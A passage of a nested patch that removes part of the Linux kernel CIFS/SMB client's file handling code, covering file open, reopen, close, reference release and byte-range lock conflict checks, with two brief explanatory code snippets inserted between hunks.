+-	kfree(cifs_file->llist);
+-	up_write(&cifsi->lock_sem);
+-
+-	cifs_put_tlink(cifs_file->tlink);
+-	dput(cifs_file->dentry);
+-	cifs_sb_deactive(sb);
+-	kfree(cifs_file->symlink_target);
+-	kfree(cifs_file);
+-}
+-
+-static void cifsFileInfo_put_work(struct work_struct *work)
+-{
+-	struct cifsFileInfo *cifs_file = container_of(work,
+-			struct cifsFileInfo, put);
+-
+-	cifsFileInfo_put_final(cifs_file);
+-}
+-
+-/**
+- * cifsFileInfo_put - release a reference of file priv data
+- *
+- * Always potentially wait for oplock handler. See _cifsFileInfo_put().
+- *
+- * @cifs_file:	cifs/smb3 specific info (eg refcounts) for an open file
+- */
+-void cifsFileInfo_put(struct cifsFileInfo *cifs_file)
+-{
+-	_cifsFileInfo_put(cifs_file, true, true);
+-}
+-
+-/**
+- * _cifsFileInfo_put - release a reference of file priv data
+- *
+- * This may involve closing the filehandle @cifs_file out on the
+- * server. Must be called without holding tcon->open_file_lock,
+- * cinode->open_file_lock and cifs_file->file_info_lock.
+- *
+- * If @wait_for_oplock_handler is true and we are releasing the last
+- * reference, wait for any running oplock break handler of the file
+- * and cancel any pending one.
+- *
+- * @cifs_file:	cifs/smb3 specific info (eg refcounts) for an open file
+- * @wait_oplock_handler: must be false if called from oplock_break_handler
+- * @offload:	not offloaded on close and oplock breaks
+- *
+- */
+-void _cifsFileInfo_put(struct cifsFileInfo *cifs_file,
+-		       bool wait_oplock_handler, bool offload)
+-{
+-	struct inode *inode = d_inode(cifs_file->dentry);
+-	struct cifs_tcon *tcon = tlink_tcon(cifs_file->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_fid fid = {};
+-	struct cifs_pending_open open;
+-	bool oplock_break_cancelled;
+-
+-	spin_lock(&tcon->open_file_lock);
+-	spin_lock(&cifsi->open_file_lock);
+-	spin_lock(&cifs_file->file_info_lock);
+-	if (--cifs_file->count > 0) {
+-		spin_unlock(&cifs_file->file_info_lock);
+-		spin_unlock(&cifsi->open_file_lock);
+-		spin_unlock(&tcon->open_file_lock);
+-		return;
+-	}
+-	spin_unlock(&cifs_file->file_info_lock);
+-
+-	if (server->ops->get_lease_key)
+-		server->ops->get_lease_key(inode, &fid);
+-
+-	/* store open in pending opens to make sure we don't miss lease break */
+-	cifs_add_pending_open_locked(&fid, cifs_file->tlink, &open);
+-
+-	/* remove it from the lists */
+-	list_del(&cifs_file->flist);
+-	list_del(&cifs_file->tlist);
+-	atomic_dec(&tcon->num_local_opens);
+-
+-	if (list_empty(&cifsi->openFileList)) {
+-		cifs_dbg(FYI, "closing last open instance for inode %p\n",
+-			 d_inode(cifs_file->dentry));
+-		/*
+-		 * In strict cache mode we need to invalidate the mapping on the
+-		 * last close because otherwise we may get an error when we open
+-		 * this file again and get at least a level II oplock.
+-		 */
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO)
+-			set_bit(CIFS_INO_INVALID_MAPPING, &cifsi->flags);
+-		cifs_set_oplock_level(cifsi, 0);
+-	}
+-
+-	spin_unlock(&cifsi->open_file_lock);
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	oplock_break_cancelled = wait_oplock_handler ?
+-		cancel_work_sync(&cifs_file->oplock_break) : false;
+-
+-	if (!tcon->need_reconnect && !cifs_file->invalidHandle) {
+-		struct TCP_Server_Info *server = tcon->ses->server;
+-		unsigned int xid;
+-
+-		xid = get_xid();
+-		if (server->ops->close_getattr)
+-			server->ops->close_getattr(xid, tcon, cifs_file);
+-		else if (server->ops->close)
+-			server->ops->close(xid, tcon, &cifs_file->fid);
+-		_free_xid(xid);
+-	}
+-
+-	if (oplock_break_cancelled)
+-		cifs_done_oplock_break(cifsi);
+-
+-	cifs_del_pending_open(&open);
+-
+-	if (offload)
+-		queue_work(fileinfo_put_wq, &cifs_file->put);
+-	else
+-		cifsFileInfo_put_final(cifs_file);
+-}
+-
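_cifsFileInfo_put() is the standard "decrement under the lock, bail out early while references remain" shape; stripped of the CIFS specifics (obj and free_object() are hypothetical):

	spin_lock(&obj->lock);
	if (--obj->count > 0) {
		spin_unlock(&obj->lock);
		return;			/* other users remain */
	}
	/* final reference: unlink from shared lists while locked, then */
	spin_unlock(&obj->lock);
	free_object(obj);		/* teardown outside the lock */
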
+-int cifs_open(struct inode *inode, struct file *file)
+-{
+-	int rc = -EACCES;
+-	unsigned int xid;
+-	__u32 oplock;
+-	struct cifs_sb_info *cifs_sb;
+-	struct TCP_Server_Info *server;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	struct cifsFileInfo *cfile = NULL;
+-	void *page;
+-	const char *full_path;
+-	bool posix_open_ok = false;
+-	struct cifs_fid fid = {};
+-	struct cifs_pending_open open;
+-	struct cifs_open_info_data data = {};
+-
+-	xid = get_xid();
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb))) {
+-		free_xid(xid);
+-		return -EIO;
+-	}
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		free_xid(xid);
+-		return PTR_ERR(tlink);
+-	}
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(file_dentry(file), page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-
+-	cifs_dbg(FYI, "inode = 0x%p file flags are 0x%x for %s\n",
+-		 inode, file->f_flags, full_path);
+-
+-	if (file->f_flags & O_DIRECT &&
+-	    cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-			file->f_op = &cifs_file_direct_nobrl_ops;
+-		else
+-			file->f_op = &cifs_file_direct_ops;
+-	}
+-
+-	/* Get the cached handle as SMB2 close is deferred */
+-	rc = cifs_get_readable_path(tcon, full_path, &cfile);
+-	if (rc == 0) {
+-		if (file->f_flags == cfile->f_flags) {
+-			file->private_data = cfile;
+-			spin_lock(&CIFS_I(inode)->deferred_lock);
+-			cifs_del_deferred_close(cfile);
+-			spin_unlock(&CIFS_I(inode)->deferred_lock);
+-			goto use_cache;
+-		} else {
+-			_cifsFileInfo_put(cfile, true, false);
+-		}
+-	}
+-
+-	if (server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (!tcon->broken_posix_open && tcon->unix_ext &&
+-	    cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		/* can not refresh inode info since size could be stale */
+-		rc = cifs_posix_open(full_path, &inode, inode->i_sb,
+-				cifs_sb->ctx->file_mode /* ignored */,
+-				file->f_flags, &oplock, &fid.netfid, xid);
+-		if (rc == 0) {
+-			cifs_dbg(FYI, "posix open succeeded\n");
+-			posix_open_ok = true;
+-		} else if ((rc == -EINVAL) || (rc == -EOPNOTSUPP)) {
+-			if (tcon->ses->serverNOS)
+-				cifs_dbg(VFS, "server %s of type %s returned unexpected error on SMB posix open, disabling posix open support. Check if server update available.\n",
+-					 tcon->ses->ip_addr,
+-					 tcon->ses->serverNOS);
+-			tcon->broken_posix_open = true;
+-		} else if ((rc != -EIO) && (rc != -EREMOTE) &&
+-			 (rc != -EOPNOTSUPP)) /* path not found or net err */
+-			goto out;
+-		/*
+-		 * Else fallthrough to retry open the old way on network i/o
+-		 * or DFS errors.
+-		 */
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (server->ops->get_lease_key)
+-		server->ops->get_lease_key(inode, &fid);
+-
+-	cifs_add_pending_open(&fid, tlink, &open);
+-
+-	if (!posix_open_ok) {
+-		if (server->ops->get_lease_key)
+-			server->ops->get_lease_key(inode, &fid);
+-
+-		rc = cifs_nt_open(full_path, inode, cifs_sb, tcon, file->f_flags, &oplock, &fid,
+-				  xid, &data);
+-		if (rc) {
+-			cifs_del_pending_open(&open);
+-			goto out;
+-		}
+-	}
+-
+-	cfile = cifs_new_fileinfo(&fid, file, tlink, oplock, data.symlink_target);
+-	if (cfile == NULL) {
+-		if (server->ops->close)
+-			server->ops->close(xid, tcon, &fid);
+-		cifs_del_pending_open(&open);
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if ((oplock & CIFS_CREATE_ACTION) && !posix_open_ok && tcon->unix_ext) {
+-		/*
+-		 * Time to set mode which we can not set earlier due to
+-		 * problems creating new read-only files.
+-		 */
+-		struct cifs_unix_set_info_args args = {
+-			.mode	= inode->i_mode,
+-			.uid	= INVALID_UID, /* no change */
+-			.gid	= INVALID_GID, /* no change */
+-			.ctime	= NO_CHANGE_64,
+-			.atime	= NO_CHANGE_64,
+-			.mtime	= NO_CHANGE_64,
+-			.device	= 0,
+-		};
+-		CIFSSMBUnixSetFileInfo(xid, tcon, &args, fid.netfid,
+-				       cfile->pid);
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-use_cache:
+-	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
+-			   file->f_mode & FMODE_WRITE);
+-	if (file->f_flags & O_DIRECT &&
+-	    (!((file->f_flags & O_ACCMODE) != O_RDONLY) ||
+-	     file->f_flags & O_APPEND))
+-		cifs_invalidate_cache(file_inode(file),
+-				      FSCACHE_INVAL_DIO_WRITE);
+-
+-out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	cifs_free_open_info(&data);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int cifs_push_posix_locks(struct cifsFileInfo *cfile);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-/*
+- * Try to reacquire byte range locks that were released when session
+- * to server was lost.
+- */
+-static int
+-cifs_relock_file(struct cifsFileInfo *cfile)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	int rc = 0;
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	down_read_nested(&cinode->lock_sem, SINGLE_DEPTH_NESTING);
+-	if (cinode->can_cache_brlcks) {
+-		/* can cache locks - no need to relock */
+-		up_read(&cinode->lock_sem);
+-		return rc;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		rc = cifs_push_posix_locks(cfile);
+-	else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		rc = tcon->ses->server->ops->push_mand_locks(cfile);
+-
+-	up_read(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-static int
+-cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+-{
+-	int rc = -EACCES;
+-	unsigned int xid;
+-	__u32 oplock;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifsInodeInfo *cinode;
+-	struct inode *inode;
+-	void *page;
+-	const char *full_path;
+-	int desired_access;
+-	int disposition = FILE_OPEN;
+-	int create_options = CREATE_NOT_DIR;
+-	struct cifs_open_parms oparms;
+-
+-	xid = get_xid();
+-	mutex_lock(&cfile->fh_mutex);
+-	if (!cfile->invalidHandle) {
+-		mutex_unlock(&cfile->fh_mutex);
+-		free_xid(xid);
+-		return 0;
+-	}
+-
+-	inode = d_inode(cfile->dentry);
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	tcon = tlink_tcon(cfile->tlink);
+-	server = tcon->ses->server;
+-
+-	/*
+-	 * Can not grab the rename sem here: various ops, including those
+-	 * that already hold the rename sem, can end up causing writepage to
+-	 * be called, and if the server was down that means we end up here;
+-	 * we can never tell if the caller already holds the rename_sem.
+-	 */
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(cfile->dentry, page);
+-	if (IS_ERR(full_path)) {
+-		mutex_unlock(&cfile->fh_mutex);
+-		free_dentry_path(page);
+-		free_xid(xid);
+-		return PTR_ERR(full_path);
+-	}
+-
+-	cifs_dbg(FYI, "inode = 0x%p file flags 0x%x for %s\n",
+-		 inode, cfile->f_flags, full_path);
+-
+-	if (tcon->ses->server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tcon->unix_ext && cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		/*
+-		 * O_CREAT, O_EXCL and O_TRUNC already had their effect on the
+-		 * original open. Must mask them off for a reopen.
+-		 */
+-		unsigned int oflags = cfile->f_flags &
+-						~(O_CREAT | O_EXCL | O_TRUNC);
+-
+-		rc = cifs_posix_open(full_path, NULL, inode->i_sb,
+-				     cifs_sb->ctx->file_mode /* ignored */,
+-				     oflags, &oplock, &cfile->fid.netfid, xid);
+-		if (rc == 0) {
+-			cifs_dbg(FYI, "posix reopen succeeded\n");
+-			oparms.reconnect = true;
+-			goto reopen_success;
+-		}
+-		/*
+-		 * fallthrough to retry open the old way on errors, especially
+-		 * in the reconnect path it is important to retry hard
+-		 */
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	desired_access = cifs_convert_flags(cfile->f_flags);
+-
+-	/* O_SYNC also has bit for O_DSYNC so following check picks up either */
+-	if (cfile->f_flags & O_SYNC)
+-		create_options |= CREATE_WRITE_THROUGH;
+-
+-	if (cfile->f_flags & O_DIRECT)
+-		create_options |= CREATE_NO_BUFFER;
+-
+-	if (server->ops->get_lease_key)
+-		server->ops->get_lease_key(inode, &cfile->fid);
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = desired_access,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.disposition = disposition,
+-		.path = full_path,
+-		.fid = &cfile->fid,
+-		.reconnect = true,
+-	};
+-
+-	/*
+-	 * Can not refresh the inode by passing in a file_info buf to be
+-	 * returned by ops->open and then calling get_inode_info with the
+-	 * returned buf, since the file might have write-behind data that
+-	 * needs to be flushed and the server's version of the file size can
+-	 * be stale. If we knew for sure that the inode was not dirty locally
+-	 * we could do this.
+-	 */
+-	rc = server->ops->open(xid, &oparms, &oplock, NULL);
+-	if (rc == -ENOENT && oparms.reconnect == false) {
+-		/* durable handle timeout is expired - open the file again */
+-		rc = server->ops->open(xid, &oparms, &oplock, NULL);
+-		/* indicate that we need to relock the file */
+-		oparms.reconnect = true;
+-	}
+-
+-	if (rc) {
+-		mutex_unlock(&cfile->fh_mutex);
+-		cifs_dbg(FYI, "cifs_reopen returned 0x%x\n", rc);
+-		cifs_dbg(FYI, "oplock: %d\n", oplock);
+-		goto reopen_error_exit;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-reopen_success:
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	cfile->invalidHandle = false;
+-	mutex_unlock(&cfile->fh_mutex);
+-	cinode = CIFS_I(inode);
+-
+-	if (can_flush) {
+-		rc = filemap_write_and_wait(inode->i_mapping);
+-		if (!is_interrupt_error(rc))
+-			mapping_set_error(inode->i_mapping, rc);
+-
+-		if (tcon->posix_extensions)
+-			rc = smb311_posix_get_inode_info(&inode, full_path, inode->i_sb, xid);
+-		else if (tcon->unix_ext)
+-			rc = cifs_get_inode_info_unix(&inode, full_path,
+-						      inode->i_sb, xid);
+-		else
+-			rc = cifs_get_inode_info(&inode, full_path, NULL,
+-						 inode->i_sb, xid, NULL);
+-	}
+-	/*
+-	 * Else we are writing out data to server already and could deadlock if
+-	 * we tried to flush data, and since we do not know if we have data that
+-	 * would invalidate the current end of file on the server we can not go
+-	 * to the server to get the new inode info.
+-	 */
+-
+-	/*
+-	 * If the server returned a read oplock and we have mandatory brlocks,
+-	 * set oplock level to None.
+-	 */
+-	if (server->ops->is_read_op(oplock) && cifs_has_mand_locks(cinode)) {
+-		cifs_dbg(FYI, "Reset oplock val from read to None due to mand locks\n");
+-		oplock = 0;
+-	}
+-
+-	server->ops->set_fid(cfile, &cfile->fid, oplock);
+-	if (oparms.reconnect)
+-		cifs_relock_file(cfile);
+-
+-reopen_error_exit:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-void smb2_deferred_work_close(struct work_struct *work)
+-{
+-	struct cifsFileInfo *cfile = container_of(work,
+-			struct cifsFileInfo, deferred.work);
+-
+-	spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-	cifs_del_deferred_close(cfile);
+-	cfile->deferred_close_scheduled = false;
+-	spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+-	_cifsFileInfo_put(cfile, true, false);
+-}
+-
+-int cifs_close(struct inode *inode, struct file *file)
+-{
+-	struct cifsFileInfo *cfile;
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_deferred_close *dclose;
+-
+-	cifs_fscache_unuse_inode_cookie(inode, file->f_mode & FMODE_WRITE);
+-
+-	if (file->private_data != NULL) {
+-		cfile = file->private_data;
+-		file->private_data = NULL;
+-		dclose = kmalloc(sizeof(struct cifs_deferred_close), GFP_KERNEL);
+-		if ((cinode->oplock == CIFS_CACHE_RHW_FLG) &&
+-		    cinode->lease_granted &&
+-		    !test_bit(CIFS_INO_CLOSE_ON_LOCK, &cinode->flags) &&
+-		    dclose) {
+-			if (test_and_clear_bit(CIFS_INO_MODIFIED_ATTR, &cinode->flags)) {
+-				inode->i_ctime = inode->i_mtime = current_time(inode);
+-			}
+-			spin_lock(&cinode->deferred_lock);
+-			cifs_add_deferred_close(cfile, dclose);
+-			if (cfile->deferred_close_scheduled &&
+-			    delayed_work_pending(&cfile->deferred)) {
+-				/*
+-				 * If there is no pending work, mod_delayed_work queues new work.
+-				 * So, increase the ref count to avoid use-after-free.
+-				 */
+-				if (!mod_delayed_work(deferredclose_wq,
+-						&cfile->deferred, cifs_sb->ctx->closetimeo))
+-					cifsFileInfo_get(cfile);
+-			} else {
+-				/* Deferred close for files */
+-				queue_delayed_work(deferredclose_wq,
+-						&cfile->deferred, cifs_sb->ctx->closetimeo);
+-				cfile->deferred_close_scheduled = true;
+-				spin_unlock(&cinode->deferred_lock);
+-				return 0;
+-			}
+-			spin_unlock(&cinode->deferred_lock);
+-			_cifsFileInfo_put(cfile, true, false);
+-		} else {
+-			_cifsFileInfo_put(cfile, true, false);
+-			kfree(dclose);
+-		}
+-	}
+-
+-	/* return code from the ->release op is always ignored */
+-	return 0;
+-}
+-
+-void
+-cifs_reopen_persistent_handles(struct cifs_tcon *tcon)
+-{
+-	struct cifsFileInfo *open_file, *tmp;
+-	struct list_head tmp_list;
+-
+-	if (!tcon->use_persistent || !tcon->need_reopen_files)
+-		return;
+-
+-	tcon->need_reopen_files = false;
+-
+-	cifs_dbg(FYI, "Reopen persistent handles\n");
+-	INIT_LIST_HEAD(&tmp_list);
+-
+-	/* list all files open on tree connection, reopen resilient handles  */
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_entry(open_file, &tcon->openFileList, tlist) {
+-		if (!open_file->invalidHandle)
+-			continue;
+-		cifsFileInfo_get(open_file);
+-		list_add_tail(&open_file->rlist, &tmp_list);
+-	}
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	list_for_each_entry_safe(open_file, tmp, &tmp_list, rlist) {
+-		if (cifs_reopen_file(open_file, false /* do not flush */))
+-			tcon->need_reopen_files = true;
+-		list_del_init(&open_file->rlist);
+-		cifsFileInfo_put(open_file);
+-	}
+-}
+-
+-int cifs_closedir(struct inode *inode, struct file *file)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	char *buf;
+-
+-	cifs_dbg(FYI, "Closedir inode = 0x%p\n", inode);
+-
+-	if (cfile == NULL)
+-		return rc;
+-
+-	xid = get_xid();
+-	tcon = tlink_tcon(cfile->tlink);
+-	server = tcon->ses->server;
+-
+-	cifs_dbg(FYI, "Freeing private data in close dir\n");
+-	spin_lock(&cfile->file_info_lock);
+-	if (server->ops->dir_needs_close(cfile)) {
+-		cfile->invalidHandle = true;
+-		spin_unlock(&cfile->file_info_lock);
+-		if (server->ops->close_dir)
+-			rc = server->ops->close_dir(xid, tcon, &cfile->fid);
+-		else
+-			rc = -ENOSYS;
+-		cifs_dbg(FYI, "Closing uncompleted readdir with rc %d\n", rc);
+-		/* not much we can do if it fails anyway, ignore rc */
+-		rc = 0;
+-	} else
+-		spin_unlock(&cfile->file_info_lock);
+-
+-	buf = cfile->srch_inf.ntwrk_buf_start;
+-	if (buf) {
+-		cifs_dbg(FYI, "closedir free smb buf in srch struct\n");
+-		cfile->srch_inf.ntwrk_buf_start = NULL;
+-		if (cfile->srch_inf.smallBuf)
+-			cifs_small_buf_release(buf);
+-		else
+-			cifs_buf_release(buf);
+-	}
+-
+-	cifs_put_tlink(cfile->tlink);
+-	kfree(file->private_data);
+-	file->private_data = NULL;
+-	/* BB can we lock the filestruct while this is going on? */
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static struct cifsLockInfo *
+-cifs_lock_init(__u64 offset, __u64 length, __u8 type, __u16 flags)
+-{
+-	struct cifsLockInfo *lock =
+-		kmalloc(sizeof(struct cifsLockInfo), GFP_KERNEL);
+-	if (!lock)
+-		return lock;
+-	lock->offset = offset;
+-	lock->length = length;
+-	lock->type = type;
+-	lock->pid = current->tgid;
+-	lock->flags = flags;
+-	INIT_LIST_HEAD(&lock->blist);
+-	init_waitqueue_head(&lock->block_q);
+-	return lock;
+-}
+-
+-void
+-cifs_del_lock_waiters(struct cifsLockInfo *lock)
+-{
+-	struct cifsLockInfo *li, *tmp;
+-	list_for_each_entry_safe(li, tmp, &lock->blist, blist) {
+-		list_del_init(&li->blist);
+-		wake_up(&li->block_q);
+-	}
+-}
+-
+-#define CIFS_LOCK_OP	0
+-#define CIFS_READ_OP	1
+-#define CIFS_WRITE_OP	2
+-
+-/* @rw_check : 0 - no op, 1 - read, 2 - write */
+-static bool
+-cifs_find_fid_lock_conflict(struct cifs_fid_locks *fdlocks, __u64 offset,
+-			    __u64 length, __u8 type, __u16 flags,
+-			    struct cifsFileInfo *cfile,
+-			    struct cifsLockInfo **conf_lock, int rw_check)
+-{
+-	struct cifsLockInfo *li;
+-	struct cifsFileInfo *cur_cfile = fdlocks->cfile;
+-	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
+-
+-	list_for_each_entry(li, &fdlocks->locks, llist) {
+-		if (offset + length <= li->offset ||
+-		    offset >= li->offset + li->length)
+-			continue;
+-		if (rw_check != CIFS_LOCK_OP && current->tgid == li->pid &&
+-		    server->ops->compare_fids(cfile, cur_cfile)) {
+-			/* shared lock prevents write op through the same fid */
+-			if (!(li->type & server->vals->shared_lock_type) ||
+-			    rw_check != CIFS_WRITE_OP)
+-				continue;
+-		}
+-		if ((type & server->vals->shared_lock_type) &&
+-		    ((server->ops->compare_fids(cfile, cur_cfile) &&
+-		     current->tgid == li->pid) || type == li->type))
+-			continue;
+-		if (rw_check == CIFS_LOCK_OP &&
+-		    (flags & FL_OFDLCK) && (li->flags & FL_OFDLCK) &&
+-		    server->ops->compare_fids(cfile, cur_cfile))
+-			continue;
+-		if (conf_lock)
+-			*conf_lock = li;
+-		return true;
+-	}
+-	return false;
+-}
+-
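The scan above first discards lock entries that do not overlap the requested range, using the standard half-open interval test. As a standalone predicate:

	/* [off1, off1+len1) and [off2, off2+len2) overlap iff neither
	 * range ends at or before the other begins */
	static bool ranges_overlap(__u64 off1, __u64 len1,
				   __u64 off2, __u64 len2)
	{
		return !(off1 + len1 <= off2 || off2 + len2 <= off1);
	}
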
+-bool
+-cifs_find_lock_conflict(struct cifsFileInfo *cfile, __u64 offset, __u64 length,
+-			__u8 type, __u16 flags,
+-			struct cifsLockInfo **conf_lock, int rw_check)
+-{
+-	bool rc = false;
+-	struct cifs_fid_locks *cur;
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-
+-	list_for_each_entry(cur, &cinode->llist, llist) {
+-		rc = cifs_find_fid_lock_conflict(cur, offset, length, type,
+-						 flags, cfile, conf_lock,
+-						 rw_check);
+-		if (rc)
+-			break;
+-	}
+-
+-	return rc;
+-}
+-
+-/*
+- * Check if there is another lock that prevents us from setting the lock
+- * (mandatory style). If such a lock exists, update the flock structure with
+- * its properties. Otherwise, set the flock type to F_UNLCK if we can cache
+- * brlocks, or leave it the same if we can't. Returns 0 if we don't need to
+- * send a request to the server, or 1 otherwise.
+- */
+-static int
+-cifs_lock_test(struct cifsFileInfo *cfile, __u64 offset, __u64 length,
+-	       __u8 type, struct file_lock *flock)
+-{
+-	int rc = 0;
+-	struct cifsLockInfo *conf_lock;
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
+-	bool exist;
+-
+-	down_read(&cinode->lock_sem);
+-
+-	exist = cifs_find_lock_conflict(cfile, offset, length, type,
+-					flock->fl_flags, &conf_lock,
+-					CIFS_LOCK_OP);
+-	if (exist) {
+-		flock->fl_start = conf_lock->offset;
+-		flock->fl_end = conf_lock->offset + conf_lock->length - 1;
+-		flock->fl_pid = conf_lock->pid;
+-		if (conf_lock->type & server->vals->shared_lock_type)
+-			flock->fl_type = F_RDLCK;
+-		else
+-			flock->fl_type = F_WRLCK;
+-	} else if (!cinode->can_cache_brlcks)
+-		rc = 1;
+-	else
+-		flock->fl_type = F_UNLCK;
+-
+-	up_read(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-static void
+-cifs_lock_add(struct cifsFileInfo *cfile, struct cifsLockInfo *lock)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	cifs_down_write(&cinode->lock_sem);
+-	list_add_tail(&lock->llist, &cfile->llist->locks);
+-	up_write(&cinode->lock_sem);
+-}
+-
+-/*
+- * Set the byte-range lock (mandatory style). Returns:
+- * 1) 0, if we set the lock and don't need to request to the server;
+- * 2) 1, if no locks prevent us but we need to request to the server;
+- * 3) -EACCES, if there is a lock that prevents us and wait is false.
+- */
+-static int
+-cifs_lock_add_if(struct cifsFileInfo *cfile, struct cifsLockInfo *lock,
+-		 bool wait)
+-{
+-	struct cifsLockInfo *conf_lock;
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	bool exist;
+-	int rc = 0;
+-
+-try_again:
+-	exist = false;
+-	cifs_down_write(&cinode->lock_sem);
+-
+-	exist = cifs_find_lock_conflict(cfile, lock->offset, lock->length,
+-					lock->type, lock->flags, &conf_lock,
+-					CIFS_LOCK_OP);
+-	if (!exist && cinode->can_cache_brlcks) {
+-		list_add_tail(&lock->llist, &cfile->llist->locks);
+-		up_write(&cinode->lock_sem);
+-		return rc;
+-	}
+-
+-	if (!exist)
+-		rc = 1;
+-	else if (!wait)
+-		rc = -EACCES;
+-	else {
+-		list_add_tail(&lock->blist, &conf_lock->blist);
+-		up_write(&cinode->lock_sem);
+-		rc = wait_event_interruptible(lock->block_q,
+-					(lock->blist.prev == &lock->blist) &&
+-					(lock->blist.next == &lock->blist));
+-		if (!rc)
+-			goto try_again;
+-		cifs_down_write(&cinode->lock_sem);
+-		list_del_init(&lock->blist);
+-	}
+-
+-	up_write(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-/*
+- * Check if there is another lock that prevents us from setting the lock
+- * (posix style). If such a lock exists, update the flock structure with
+- * its properties. Otherwise, set the flock type to F_UNLCK if we can cache
+- * brlocks, or leave it the same if we can't. Returns 0 if we don't need to
+- * send a request to the server, or 1 otherwise.
+- */
+-static int
+-cifs_posix_lock_test(struct file *file, struct file_lock *flock)
+-{
+-	int rc = 0;
+-	struct cifsInodeInfo *cinode = CIFS_I(file_inode(file));
+-	unsigned char saved_type = flock->fl_type;
+-
+-	if ((flock->fl_flags & FL_POSIX) == 0)
+-		return 1;
+-
+-	down_read(&cinode->lock_sem);
+-	posix_test_lock(file, flock);
+-
+-	if (flock->fl_type == F_UNLCK && !cinode->can_cache_brlcks) {
+-		flock->fl_type = saved_type;
+-		rc = 1;
+-	}
+-
+-	up_read(&cinode->lock_sem);
+-	return rc;
+-}
+-
+-/*
+- * Set the byte-range lock (posix style). Returns:
+- * 1) <0, if the error occurs while setting the lock;
+- * 2) 0, if we set the lock and don't need to request to the server;
